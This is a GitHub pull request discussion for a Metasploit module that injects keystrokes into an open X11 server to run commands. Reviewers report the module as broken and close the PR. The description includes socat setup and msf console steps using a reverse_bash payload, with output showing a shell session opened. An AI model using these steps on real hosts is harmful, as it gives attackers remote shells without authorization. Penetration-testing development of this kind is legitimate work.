X11 Keyboard Exec #5692
X11 Keyboard Exec #5692
Conversation
|
Maybe rename to X11 Keyboard Command Injection? |
|
@hmoore-r7 Sounds fine to me! Let me know if you want me to change it, although I won't have time until next week for this. |
| release_key(KB_KEYS["f2"]) | ||
|
|
||
| # Wait a second to open the dialog | ||
| select(nil, nil, nil, 1) |
There was a problem hiding this comment.
One second may be too slow for a host where the X services have been moved to (slow) swap. Making this configurable would be helpful.
|
@xistence Ping on this one as well, it seems pretty close to mergeable. |
|
@hmoore-r7 I've added a TIME_WAIT option to wait for the GUI. The default is 5 seconds. |
|
Thanks! |
|
@xistence I haven't been able to get this to work; even on an open X11 display, all I get back is an error for each keypress. I have tried Kali 1.0 and Ubuntu 14.04. A wireshark of the traffic just shows mangled X11 replies. |
|
It looks like the wire protocol is not correct; it doesn't match XSendEvent or XTEST in terms of format. I would suggest fixing this module to use XSendEvent (more widely compatible). I will PR some style/API changes back to your PR. |
|
Style/API PR is at https://github.com/xistence/metasploit-framework/pull/5 |
|
@xistence I am going to close this for now, but we can reopen if you get time to work on this. Thanks! |
This module connects to an open X11 server and registers as a virtual keyboard. After this keystrokes are sent to "type" and execute a payload.
How to reproduce the easiest way (Tested on Kali linux):
On Kali run the following command to make the X11 socket available on all interfaces on port 6000:
socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0
Make sure you are logged in on the X11 GUI of Kali.
Run the exploit (For extra fun watch the commands getting typed in the Linux X11 GUI:))
msf > use exploit/unix/x11/x11_keyboard_exec
msf exploit(x11_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(x11_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(x11_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.130:6000 - Register keyboard
[] 192.168.2.130:6000 - Opening "Run Application"
[] 192.168.2.130:6000 - Opening xterm
[] 192.168.2.130:6000 - Typing and executing payload
[] Command shell session 78 opened (192.168.2.130:4444 -> 192.168.2.130:51523) at 2015-07-10 13:50:35 +0700